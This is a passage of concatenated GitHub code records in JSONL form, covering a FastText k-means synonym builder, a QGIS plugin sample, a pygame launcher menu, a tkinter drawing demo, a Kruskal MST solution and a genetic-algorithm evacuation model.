file'''\n numpy_arrays = []\n labels_array = []\n with codecs.open(vector_file, 'r', 'utf-8') as f:\n for c, r in enumerate(f):\n sr = r.split()\n labels_array.append(sr[0])\n numpy_arrays.append( numpy.array([float(i) for i in sr[1:]]) )\n\n if c == n_words:\n return numpy.array( numpy_arrays ), labels_array\n\n return numpy.array( numpy_arrays ), labels_array\n\ndef find_word_clusters(labels_array, cluster_labels):\n '''Return the set of words in each cluster'''\n cluster_to_words = autovivify_list()\n for c, i in enumerate(cluster_labels):\n cluster_to_words[ i ].append( labels_array[c] )\n return cluster_to_words\n\nword_list = []\nsentences = []\n\nstop_words = set(stopwords.words('english'))\n\n# filename = sys.argv[1]\n\n# python kmeans.py glove.6B.100d.txt 300 .1\nif __name__ == \"__main__\":\n # with open(\"../sentences.pkl\", \"rb\") as f:\n # sentences = pickle.load(f)\n\n # with open(\"../word_list.pkl\", \"rb\") as f:\n # word_list = pickle.load(f)\n\n with open(\"../data/X.txt\", 'r') as f:\n cnt = 0\n for line in f:\n cnt = cnt + 1\n if cnt%500 == 0:\n print(\"processed: \"+str(cnt)+\" lines!\")\n word_list.extend(nltk.word_tokenize(line))\n word_list = list(set(word_list))\n sublines = line.strip().split('.')\n sublines = 
[subline.strip().split(' ') for subline in sublines]\n sentences.extend(sublines)\n word_list = [word for word in word_list if word.isalpha()]\n print (\"Punctuations removed...\")\n word_list = [word for word in word_list if not word in stop_words]\n print (\"Stop words removed...\")\n word_list = list(set(word_list))\n print(\"word_list created successfully!\\n\"+str(len(word_list)))\n print(len(sentences))\n\n # using FastText to create embeddings from our dataset\n print(\"creating FastText model!\")\n model = FastText(sentences, size=100, window=5, min_count=5, workers=8,sg=1)\n print(\"FastText model created successfully!\")\n \n numpy_arrays = []\n labels_array = []\n print(\"creating vocabulary clusters...\")\n for word in word_list:\n labels_array.append(word)\n try:\n numpy_arrays.append(model[word])\n except:\n pass\n df = numpy.array(numpy_arrays)\n\n n_words = int(sys.argv[1]) # Number of words to analyze\n reduction_factor = float(sys.argv[2]) # Amount of dimension reduction {0,1}\n n_clusters = int( n_words * reduction_factor ) # Number of clusters to make\n kmeans_model = KMeans(init='k-means++', n_clusters=n_clusters, n_init=10)\n kmeans_model.fit(df)\n\n cluster_labels = kmeans_model.labels_\n cluster_inertia = kmeans_model.inertia_\n cluster_to_words = find_word_clusters(labels_array, cluster_labels)\n\n with open('cluster_to_words.ft.pkl', 'wb') as f:\n pickle.dump(cluster_to_words, f)\n \n print(\"cluster vocabulary created successfully!\")\n\n with open('cluster_to_words.ft.pkl', 'rb') as f:\n clusters = pickle.load(f)\n \n # print(clusters)\n\n# maxlen = 0\nwith open('synonym_sample.kmeans1.ft.syn', 'w+') as f:\n print(\"creating dictionary...\")\n for c in clusters:\n # print((clusters[c]))\n # print(\"\\n\")\n # maxlen = max(maxlen, len(clusters[c]))\n # if maxlen < len(clusters[c]):\n # maxlen = len(clusters[c])\n # maxc = clusters[c]\n \n words = clusters[c]\n root, words = words[0], words[1:]\n \n f.write(root+' '+root+'\\n')\n for i in range(len(words)):\n f.write(words[i]+' '+root+'\\n')\n f.write('indices'+' '+'index*')\n print(\"dictionary created successfully...\")\n\n # print(maxlen)\n # print(maxc)","repo_name":"urmisaha/Semantic_Text_Indexing_With_PostgreSQL","sub_path":"k-means-clustering/kmeans_create_vocab.py","file_name":"kmeans_create_vocab.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71788540167","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom .resources import *\n\n#メニュー読み込み\nfrom .Sample_Menu_01 import SampleMenu01\nfrom .Sample_Menu_02 import SampleMenu02\n\nimport os\nimport os.path\nimport sys\nimport codecs\n\nQString = str\n\ntry:\n _fromUtf8 = QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass Sample:\n def __init__(self, iface):\n self.iface = iface\n self.canvas = self.iface.mapCanvas()\n\n self.plugin_dir = os.path.dirname(__file__)\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'Sample_{}.qm'.format(locale))\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n self.actions = []\n self.menu = u'Sample'\n self.toolbar = self.iface.addToolBar(u'Sample')\n self.toolbar.setObjectName(u'Sample')\n\n def 
tr(self, message):\n return QCoreApplication.translate('Sample', message)\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n if status_tip is not None:\n action.setStatusTip(status_tip)\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n if add_to_toolbar:\n self.toolbar.addAction(action)\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n self.actions.append(action)\n return action\n\n def initGui(self):\n self.win = self.iface.mainWindow()\n icon_path = ':/plugins/Sample/icon.png'\n #メニュー設定\n self.add_action(\n icon_path=None,\n text=u\"Menu01\",\n callback=self.Menu01,\n parent=self.win)\n self.add_action(\n icon_path=None,\n text=u\"Menu02\",\n callback=self.Menu02,\n parent=self.win)\n\n def unload(self):\n for action in self.actions:\n self.iface.removePluginMenu(\n u'Sample',\n action)\n self.iface.removeToolBarIcon(action)\n del self.toolbar\n\n #Menu01メニュークリック\n def Menu01(self):\n #SampleMenu01読み込み\n self.sample_menu_01 = SampleMenu01(self.iface)\n #Menu01クリックでメッセージ表示\n self.sample_menu_01.message_add()\n\n #Menu02メニュークリック\n def Menu02(self):\n #SampleMenu02読み込み\n self.sample_menu_02 = SampleMenu02(self.iface)\n #SampleMenu02Dialog表示\n self.sample_menu_02.dlg.show()\n\n def run(self):\n pass\n","repo_name":"dayjournal/PythonMapAppPlugin","sub_path":"Chapter_04/qgis3plugin-starter/dist/Sample/Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"47331943420","text":"# coding=utf-8\n\n# python2 issues, div with float, not int\nfrom __future__ import division\nimport pygame\nimport os\n\ntry:\n from datetime import datetime, timedelta\nexcept:\n import datetime\n\nfrom core.constants import *\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(os.path.join(PATH, \"log.txt\"))\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nfrom core.colors import *\nfrom core.component.upbar import UpBar\n\nfrom core.component.squaredmenu import SquaredMenu\nfrom core.component.dialog import Dialog\nfrom core.component.simplenotification import SimpleNotification\nfrom core.component.mainpygame import MainPyGame\nfrom core.section.gogpygame import GOGPygame\nfrom core.section.itchpygame import ItchPygame\nfrom core.section.repositorypygame import RepositoryPygame\nfrom core.section.settingspygame import SettingsPygame\nfrom core.section.quitpygame import QuitPygame\nfrom core.section.wificonfigurationpygame import WifiConfigurationPygame\nfrom core.effect.pixelate import pixelate\n\nclass MenuPygame(MainPyGame, SquaredMenu, GOGPygame, ItchPygame, RepositoryPygame, SettingsPygame, WifiConfigurationPygame, QuitPygame):\n\n def __init__(self):\n # init\n # pygame.init()\n pygame.display.init()\n pygame.font.init()\n\n self.initJoysticks()\n self.loadSettings()\n self.playMusicFromSettings()\n # Create pygame screen and objects\n #self.surface = pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n self.surface = pygame.display.set_mode(WINDOW_SIZE)\n self.clock = pygame.time.Clock()\n 
pygame.display.set_caption('Menu principal')\n self.gog = None #TODO check if it could be serialized, stored, restored and synchronized with background process\n self.itch = None\n\n def main(self):\n self.notification = SimpleNotification(surface=self.surface,clock=self.clock,parent=self)\n #show notification for dev revision\n self.notification.showNotification(text='dev revision')\n options = [\n {\n \"title\" : \"Aceptar\"\n }\n ]\n #show alert for configuration\n self.dialog = Dialog(surface=self.surface,title=\"Welcome\",message=\"Please configure before use\",options=options)\n self.dialog.draw()\n\n self.drawMainMenu()\n\n def drawMainMenu(self):\n menus = [\n {\"title\": \"Itch.io (alpha)\", \"image\": \"images/itch.png\", \"action\": self.navigateItch},\n {\"title\": \"GOG (alpha)\", \"image\": \"images/GOG.png\", \"action\": self.navigateGOG},\n {\"title\": \"Wifi Configuration\", \"image\": \"images/wifi.png\", \"action\": self.configWifi},\n {\"title\": \"Remote repository\", \"image\": \"images/cloud.png\", \"action\": self.navigateRepository},\n {\"title\": \"Local\", \"image\": \"images/hdd.png\", \"action\": self.createLocalRepo},\n {\"title\": \"Settings\", \"image\": \"images/settings.png\", \"action\": self.settingsMenu},\n {\"title\": \"Exit\", \"image\": \"images/exit.png\", \"action\": self.quit}\n ]\n self.manageMainEvents(menus)\n\n #used to refresh main menu\n def drawMainMenuComponents(self,menus,selected,visibleOptions):\n # draw components\n #self.drawComponents() # at this moment bars\n self.upbar.drawBackground()\n self.upbar.refresh()\n #self.upbar.menu.draw()\n #self.upbar.drawWidgets()\n\n # clean events, needs to be after drawComponents\n self.changes = False\n\n # now draw menus\n rectangles = self.drawSquaredMenus(menus, selected, visibleOptions)\n\n return rectangles\n\n #used to get widgets updated\n def lastTimeWorker(self):\n if self.lastTime + timedelta(seconds=1) > datetime.now():\n #logger.debug(\"refreshing time at %s \" % datetime.now())\n self.lastTime = datetime.now()\n self.upbar.drawWidgets()\n self.changes = False\n\n def manageMainEvents(self, menus, visibleOptions=4): # TODO\n exit = False\n selected = 0\n self.changes = True\n #build component\n self.upbar = UpBar(surface=self.surface)\n\n # colored background\n self.main_background()\n\n refreshed = False\n\n self.lastTime = datetime.now()\n\n hiddenNotification = None\n pixelateTime = None\n while not exit:\n\n if not pixelateTime:\n pixelate(self.surface,False)\n pixelateTime = True\n\n self.clock.tick(FPS)\n\n if self.changes:\n # clean and put background\n self.main_background()\n\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n # clear events\n pygame.event.clear()\n\n if hiddenNotification is not None:\n self.changes = True\n if hiddenNotification + timedelta(seconds=1) > datetime.now():\n #self.notification = None\n pass\n\n if (self.notification is not None and self.notification.active): #TODO\n if (self.notification is not None and self.notification.active):\n hiddenNotification = datetime.now()\n #logger.debug(\"updating when notification is shown... 
%s\" % hiddenNotification)\n elif hiddenNotification is not None and hiddenNotification+timedelta(seconds=1) > datetime.now():\n if not refreshed:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n refreshed = True\n logger.debug(\"launched one refresh of the components before wait 1 second of last notification was hidden\")\n elif hiddenNotification is not None:\n logger.debug(\"launched final refresh of the components after 1 second of last notification was hidden\")\n hiddenNotification = None\n if self.notification:\n self.main_background()\n rectangles = self.drawMainMenuComponents(menus, selected, visibleOptions)\n\n self.lastTimeWorker()\n\n # DEBUG: get events and configure\n events = pygame.event.get()\n if len(events) != 0:\n logger.debug(\"mainEvent event %s\" % str(events))\n\n #now manage dialog\n options = None\n if self.dialog is not None and self.dialog.active:\n options = self.dialog.draw(focus=selected)\n else:\n self.dialog = None\n for event in events:\n # normal events\n if event.type == pygame.QUIT:\n exit = True\n elif event.type == pygame.KEYDOWN:\n self.changes = True\n if event.key == pygame.K_ESCAPE:\n pixelate(self.surface,True)\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n exit = True\n elif event.key == pygame.K_UP:\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_DOWN:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_LEFT:\n # normal part\n if selected > 0:\n selected -= 1\n elif event.key == pygame.K_RIGHT:\n if self.dialog is not None and self.dialog.active:\n # normal part\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.key == pygame.K_b:\n if self.dialog is not None and self.dialog.active:\n self.dialog.active = False\n selected = 0\n else:\n #normal part\n exit = True\n elif event.key == pygame.K_a or event.key == pygame.K_RETURN:\n if self.dialog is not None and self.dialog.active:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n else:\n #normal part\n pixelate(self.surface,True)\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.key == pygame.K_f:\n if self.surface.get_flags() & pygame.FULLSCREEN:\n pygame.display.set_mode(WINDOW_SIZE)\n else:\n pygame.display.set_mode(WINDOW_SIZE, pygame.FULLSCREEN)\n elif event.type == pygame.JOYAXISMOTION:\n self.changes = True\n if event.axis == 1: # up and down\n if event.value > 0:\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n elif event.axis == 0: # left and right\n if event.value > 0:\n if self.dialog is not None and self.dialog.active:\n if selected < len(options) - 1:\n selected += 1\n else:\n # normal part\n if selected < len(menus) - 1:\n selected += 1\n elif event.value < 0:\n if selected > 0:\n selected -= 1\n\n elif event.type == pygame.JOYBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n if event.button == 1:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n elif event.button == 2:\n selected = 0\n self.dialog.active = False\n else:\n # normal part\n self.changes = True\n if event.button == 1: # button A - enter\n 
menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n elif event.button == 2: # button B - back\n exit = True\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.dialog is not None and self.dialog.active:\n for i in range(0,len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n selected = i\n else:\n #normal part\n i = 0\n self.changes = True\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I deduced position %s\" % (start + i))\n selected = (start + i)\n i += 1\n elif event.type == pygame.MOUSEBUTTONUP:\n if self.dialog is not None and self.dialog.active:\n newSelected = -1\n for i in range(0, len(options)):\n option = options[i]\n if option[\"rectangle\"].collidepoint(event.pos):\n newSelected = i\n if newSelected == selected:\n if \"action\" in options[selected]:\n options[selected][\"action\"]()\n self.dialog.active = False\n self.changes = True\n else:\n # normal part\n i = 0\n for rectangle in rectangles:\n if rectangle.collidepoint(event.pos):\n if visibleOptions > len(menus):\n visibleOptions = len(menus)\n start = 0\n if selected > int(visibleOptions / 2):\n start = int(visibleOptions / 2)\n if start + visibleOptions > len(menus):\n start = len(menus) - visibleOptions\n end = start + visibleOptions\n logger.debug(\"start %s end %s\" % (start, end))\n logger.debug(\"I will launch and select position %s\" % (start + i))\n launch = selected == (start + i)\n selected = (start + i)\n if launch:\n menus[selected][\"action\"]()\n self.changes = True\n self.lastTime = datetime.now()\n i += 1\n\n pygame.display.flip()\n\n def drawComponents(self):\n self.upbar.draw()\n\n def main_background(self):\n\n if self.on and self.file is not None: # play background music\n self.surface.blit(self.pic, (0, 0))\n else:\n self.surface.fill(COLOR_BACKGROUND)\n","repo_name":"lemoncrest/x-pi-one-launcher","sub_path":"core/section/menupygame.py","file_name":"menupygame.py","file_ext":"py","file_size_in_byte":15414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"15964757448","text":"import tkinter\n\n\ndef f(event):\n c.create_oval((event.x - 10,event.y - 10), (event.x + 10,event.y + 10), fill=color)\n\n\ndef keypress(event):\n global color\n if event.keysym == \"r\":\n color = \"red\"\n if event.keysym == \"g\":\n color = \"green\"\n if event.keysym == \"b\":\n color = \"blue\"\n\n\nw = tkinter.Tk()\ncolor = \"red\"\nc = tkinter.Canvas(width=500, height=500, background=\"white\")\nc.pack()\nc.bind(\"<Motion>\", f)\nw.bind(\"<KeyPress>\", keypress)\nw.mainloop()\n","repo_name":"yandex-lyceum-yakovlev/tkProject2","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37448544670","text":"# -*- coding: utf-8 -*-\nimport geatpy as ea # import geatpy\nimport numpy as np\nimport random\nB=3\nR=6 #此语义下隐含条件 R必须为偶数\nY=1\nS=3\nT=3\nN=Y+S+T\n# 编号规则 稍后补充Dij的自动生成算法\n# 从0开始编号,编号顺序 Y~S~T\nDij=np.array([[0,7,4,9,0,0,0],\n [7,0,0,0,6,7,8],\n [4,0,0,0,10,9,2],\n [9,0,0,0,6,3,7],\n [0,6,10,6,0,0,0],\n 
[0,7,9,3,0,0,0],\n [0,8,2,7,0,0,0]])\n# d=np.array([[6,7,8],\n# [10,9,2],\n# [6,3,7]])\n# dStart=np.array([7,4,9])\nL=np.array([1,3,3])\nU=np.array([4,4,1])\nNind=50\ncount=1\n\nclass MyProblem(ea.Problem): # 继承Problem父类\n def __init__(self):\n name = 'MyProblem' # 初始化name(函数名称,可以随意设置)\n M = 1 # 初始化M(目标维数)\n maxormins = [1] # 初始化maxormins(目标最小最大化标记列表,1:最小化该目标;-1:最大化该目标)\n # Dim = B*R*S*T # 初始化Dim(决策变量维数)\n Dim = N * N * (B + R) # 初始化Dim(决策变量维数)\n varTypes = [1] * Dim # 初始化varTypes(决策变量的类型,元素为0表示对应的变量是连续的;1表示是离散的)\n lb = [0] * Dim # 决策变量下界\n ub = [2] * Dim# 决策变量上界\n lbin = [1] * Dim # 决策变量下边界(0表示不包含该变量的下边界,1表示包含)\n ubin = [1] * Dim # 决策变量上边界(0表示不包含该变量的上边界,1表示包含)\n # 调用父类构造方法完成实例化\n ea.Problem.__init__(self, name, M, maxormins, Dim, varTypes, lb, ub, lbin, ubin)\n def calReferObjV(self): # 设定目标数参考值(本问题目标函数参考值设定为理论最优值)\n referenceObjV = np.array([[23]])\n return referenceObjV\n\n def aimFunc(self, pop): # 目标函数\n global count\n print(str(count)+\":\",end=\"\")\n count+=1\n\n Yijb = pop.Phen[:,:N*N*B].reshape([Nind, N, N, B]).astype(int) # 得到决策变量矩阵Xijb\n Xijr = pop.Phen[:,N*N*B:].reshape([Nind, N, N, R]).astype(int) # 得到决策变量矩阵Xijr\n l = list(range(Y)) + list(range(Y + S, N))\n\n # 目标函数\n TmaxMin = np.zeros((Nind, B), dtype=np.int) # b # 40*b(40*3)\n for b in range(B):\n for i in range(Y):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(S):\n for j in l:\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n for i in range(N):\n for j in range(Y,Y+S):\n TmaxMin[:, [b]] += Dij[i][j] * Yijb[:, [i], [j], [b]]\n\n #PPT式1\n CV1=abs(Xijr.sum(axis=3)-Yijb.sum(axis=3)).sum(axis=(1,2)).reshape(Nind,1)\n\n # PPT式2\n preCV2 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV2[:, :] -= Yijb.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV2 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV2[q] += abs(preCV2[q][i])\n\n\n # PPT式3\n preCV3 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV3[:, :] -= Yijb.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV3 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV3[q][j] < 0:\n CV3[q] -= preCV3[q][j]\n\n # PPT式4\n preCV4 =np.stack([np.array(L) for _ in range(Nind)], axis=0)\n preCV4[:, :] -= Xijr.sum(axis=(2,3)).reshape(Nind,N)[:,Y:Y+S]\n CV4 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for i in range(S):\n CV4[q] += abs(preCV4[q][i])\n\n # PPT式5\n preCV5 =np.stack([np.array(U) for _ in range(Nind)], axis=0)\n preCV5[:, :] -= Xijr.sum(axis=(1,3)).reshape(Nind,N)[:,Y+S:N]\n CV5 = np.zeros((Nind, 1), dtype=np.int)\n for q in range(Nind):\n for j in range(T):\n if preCV5[q][j] < 0:\n CV5[q] -= preCV5[q][j]\n\n # PPT式6 有问题 待修改\n # CV6 = np.zeros((Nind, 1), dtype=np.int)\n # for n in range(Nind):\n # for r in range(R-1):\n # tmpSum=0\n # for i in range(S):\n # for j in range(T):\n # tmpSum+=Xijr[n][i+Y][j+Y+S][r]-Xijr[n][i+Y][j+Y+S][r+1]\n # if tmpSum<0:\n # CV6[n]-=tmpSum\n\n #纸式1\n CV7 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for r in range(R-1):\n tmpSum=0\n for i in l:\n tmpSum += Xijr[n][i][j + Y][r] - Xijr[n][j + Y][i][r + 1]\n # if tmpSum!=0:\n CV7[n]+=abs(tmpSum)\n\n #纸式2\n CV8 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for r in range(R-1):\n tmpSum=0\n for i in range(S):\n tmpSum += Xijr[n][i+Y][j + Y+S][r] - Xijr[n][j + Y+S][i+Y][r + 1]\n if tmpSum<0:\n CV8[n]-=tmpSum\n\n #纸式3\n CV9 = np.zeros((Nind, 1), dtype=np.int)\n for n 
in range(Nind):\n for r in range(R):\n tmpSum=0\n for i in range(S):\n for j in range(T):\n tmpSum+=Xijr[n][i+Y][j+Y+S][r]\n if tmpSum>B:\n CV9[n]+=tmpSum-B\n\n # 纸式4\n CV10 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for b in range(B):\n tmpSum = 0\n for i in range(S):\n for j in range(T):\n tmpSum += Yijb[n][i + Y][j + Y + S][b]\n if tmpSum > R:\n CV10[n] += tmpSum - R\n\n # 纸式5\n CV11 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for i in l:\n CV11[n]+=abs(Xijr[n][i][j+Y][R-1])\n\n # 纸式6\n CV12 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(S):\n for b in range(B):\n tmpSum=0\n for i in l:\n tmpSum+=Yijb[n][i][j+Y][b]-Yijb[n][j+Y][i][b]\n # if tmpSum!=0:\n CV12+=abs(tmpSum)\n\n # 纸式7\n CV13 = np.zeros((Nind, 1), dtype=np.int)\n for n in range(Nind):\n for j in range(T):\n for b in range(B):\n tmpSum=0\n for i in range(S):\n tmpSum += Yijb[n][i+Y][j + Y+S][b] - Yijb[n][j + Y+S][i+Y][b]\n if tmpSum<0 or tmpSum>1:\n CV13[n]+=abs(tmpSum)\n\n pop.ObjV = np.max(TmaxMin, axis=1).reshape(Nind, 1) # 计算目标函数值,赋值给pop种群对象的ObjV属性\n pop.CV=np.hstack([CV1,CV2,CV3,CV4,CV5,CV7,CV8,CV9,CV10,CV11,CV12,CV13])\n\n print(pop.CV.sum()//NIND)\n\n\ndef initData():\n L = np.ones(3)\n U = np.zeros(3) #初始化\n while (L.sum() > U.sum()): #防止生成的数据本身无法满足救援条件\n B = random.randint(2, 5)\n R = random.randint(2, 5)\n S = random.randint(2, 5)\n T = random.randint(2, 5)\n d = np.random.randint(1, 11, size=(S, T))\n dStart = np.random.randint(1, 11, size=S)\n L = np.random.randint(1, 6, size=S)\n U = np.random.randint(1, 6, size=T)\n print('本次基因长度为 %d ,随机生成的变量值为:'%(S*T*B*R))\n print(' | S | T | B | R | ')\n print('---------------------------')\n print(\" | \", S, \" | \", T, \" | \", B, \" | \", R, \" | \")\n print('Source 与 Sink 间距离矩阵')\n print(d)\n print('Single Yard 与各个 Source 间距离矩阵')\n print(dStart)\n print('%d 个 Source 的待救援者人数分别为' % S)\n print(L)\n print('%d 个 Sink 的最大容量分别为' % T)\n print(U)\n\nif __name__ == '__main__':\n \"\"\"==============================随机生成原始数据==========================\"\"\"\n # initData()\n \"\"\"===============================实例化问题对象===========================\"\"\"\n problem = MyProblem() # 生成问题对象\n \"\"\"=================================种群设置==============================\"\"\"\n Encoding = 'RI' # 编码方式\n NIND = Nind # 种群规模\n Field = ea.crtfld(Encoding, problem.varTypes, problem.ranges, problem.borders) # 创建区域描述器\n population = ea.Population(Encoding, Field, NIND) # 实例化种群对象(此时种群还没被初始化,仅仅是完成种群对象的实例化)\n \"\"\"===============================算法参数设置=============================\"\"\"\n myAlgorithm = ea.soea_SEGA_templet(problem, population) # 实例化一个算法模板对象\n myAlgorithm.recOper = ea.Xovdp(XOVR=0.9, Parallel=True) # 设置交叉算子\n myAlgorithm.mutOper = ea.Mutinv(Pm=0.05, Parallel=True) # 设置变异算子\n\n # myAlgorithm = ea.soea_DE_rand_1_L_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm = ea.soea_DE_currentToBest_1_bin_templet(problem, population) # 实例化一个算法模板对象\n # myAlgorithm.mutOper.F = 0.7 # 差分进化中的参数F\n # myAlgorithm.recOper.XOVR = 0.7 # 重组概率\n\n myAlgorithm.MAXGEN = 200 # 最大进化代数\n myAlgorithm.logTras = 1 # 设置每隔多少代记录日志,若设置成0则表示不记录日志\n myAlgorithm.verbose = True # 设置是否打印输出日志信息\n myAlgorithm.drawing = 1 # 设置绘图方式(0:不绘图;1:绘制结果图;2:绘制目标空间过程动画;3:绘制决策空间过程动画)\n \"\"\"===========================根据先验知识创建先知种群========================\"\"\"\n # prophetChrom = np.zeros([NIND,N * N * (B+R)],dtype=np.int)\n\n tmpProp1=np.zeros([N ,N ,B],dtype=np.int)\n 
tmpProp1[0][1][0]=tmpProp1[1][4][0]=tmpProp1[4][3][0]=tmpProp1[3][5][0]=tmpProp1[0][2][1]=tmpProp1[2][4][1]=tmpProp1[4][3][1]=tmpProp1[3][5][1]=tmpProp1[0][2][2]=tmpProp1[2][6][2]=tmpProp1[6][2][2]=tmpProp1[2][5][2]=tmpProp1[5][3][2]=tmpProp1[3][5][2]=1\n tmpProp2 = np.zeros([N, N, R], dtype=np.int)\n tmpProp2[0][1][0]=tmpProp2[1][4][1]=tmpProp2[2][4][1]=tmpProp2[2][6][1]=tmpProp2[6][2][2]=tmpProp2[2][5][3]=tmpProp2[5][3][4]=tmpProp2[3][5][5]=1\n tmpProp2[0][2][0]=tmpProp2[4][3][2]=tmpProp2[3][5][3]=2\n tmpProp=np.append(tmpProp1,tmpProp2)\n prophetChrom = np.stack([np.array(tmpProp) for _ in range(Nind)], axis=0)\n\n prophetPop=ea.Population(Encoding, Field, NIND,prophetChrom)\n myAlgorithm.call_aimFunc(prophetPop) # 计算先知种群的目标函数值及约束(假如有约束)\n \"\"\"==========================调用算法模板进行种群进化========================\"\"\"\n [BestIndi, population] = myAlgorithm.run(prophetPop) # 执行算法模板,得到最优个体以及最后一代种群\n # [BestIndi, population] = myAlgorithm.run() # 执行算法模板,得到最优个体以及最后一代种群\n BestIndi.save() # 把最优个体的信息保存到文件中\n \"\"\"=================================输出结果==============================\"\"\"\n print('评价次数:%s' % myAlgorithm.evalsNum)\n print('时间已过 %s 秒' % myAlgorithm.passTime)\n if BestIndi.sizes != 0:\n print('最优的目标函数值为:%s' % BestIndi.ObjV[0][0])\n print('最优的控制变量值为:')\n for i in range(BestIndi.Phen.shape[1]):\n print(BestIndi.Phen[0, i],end=\" \")\n print(\"\")\n # print('最优的i,j,b,r值为:')\n # print(' | b | r | i | j | ')\n # print('---------------------------')\n # Xijbr=BestIndi.Phen.reshape(3,3,3,3)\n # for b in range(B):\n # for r in range(R):\n # for i in range(S):\n # for j in range(T):\n # if(Xijbr[i][j][b][r]==1):\n # print(\" | \",b+1,\" | \",r+1,\" | \",i+1,\" | \",j+1,\" | \")\n else:\n print('没找到可行解。')","repo_name":"aspxcor/Optimization-Plan-for-Emergency-Evacuation-of-Personnel-Based-on-Optimization-Algorithm","sub_path":"Code/Problem1/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"70129675210","text":"def solution(n, costs):\n \n def find_set(x):\n if x != parent[x]:\n parent[x] = find_set(parent[x])\n return parent[x]\n \n costs.sort(key=lambda x: x[2])\n parent = list(range(n))\n count, cost = 0, 0\n for s, e, w in costs:\n s_root, e_root = find_set(s), find_set(e)\n if s_root != e_root:\n parent[e_root] = s_root\n cost += w\n count += 1\n if count >= n-1:\n break\n return cost","repo_name":"kylekim2123/Algorithm-with-Python","sub_path":"Programmers/Level3/섬연결하기.py","file_name":"섬연결하기.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13312522172","text":"\n# 3. multiple user input in dictionary using while loop\n\nuser_vacations = {}\n\nactive_polling = True\nprompt1 = \"what is your name? \"\nprompt2 = \"If you could visit one place in the world, where would you go? \"\nprompt3 = \"Would you like to continue for other? 
